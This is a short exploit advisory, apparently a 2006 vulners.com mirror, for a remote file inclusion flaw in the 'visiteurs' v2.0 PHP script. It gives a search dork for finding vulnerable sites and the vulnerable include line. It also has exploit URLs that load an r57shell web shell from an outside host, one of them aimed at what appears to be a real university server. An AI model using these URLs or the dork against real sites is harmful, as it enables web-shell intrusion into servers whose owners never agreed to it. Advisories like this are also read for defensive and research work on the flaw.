lesvisit (visiteurs) <= v2.0 (lvc_include_dir) Remote File Include Vulnerability

2006-09-2900:00:00

vulners.com

#==============================================================================================
#lesvisit (visiteurs) <= v2.0 (lvc_include_dir) Remote File Include Vulnerability
#===============================================================================================

#Critical Level : Dangerous

#Download from : http://www.comscripts.com/jump.php?action=script&id=41

#Version : 2.0

#================================================================================================

#Dork : "visiteurs v2.0"

#================================================================================================
#Bug in : /include/config.inc.php

#Vlu Code :
#--------------------------------

include($lvc_include_dir.'lang/english.inc.php');

http://www.ensg.ign.fr/~daniel/ganesha/visiteurs20/include/config.inc.php?lvc_include_dir=http://d4wood.by.ru/r57shell.php?

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/include/config.inc.php?lvc_include_dir=http://sheller.com?

#================================================================================================
#Discoverd By : D_7J

#Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)

#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net

#Special Thx To : Str0ke

#Greetz: All Iranian Hackers

==================================================================================================

JSON

lesvisit &#40;visiteurs&#41; &lt;= v2.0 &#40;lvc_include_dir&#41; Remote File Include Vulnerability

include($lvc_include_dir.'lang/english.inc.php');

http://www.ensg.ign.fr/~daniel/ganesha/visiteurs20/include/config.inc.php?lvc_include_dir=http://d4wood.by.ru/r57shell.php?

lesvisit (visiteurs) <= v2.0 (lvc_include_dir) Remote File Include Vulnerability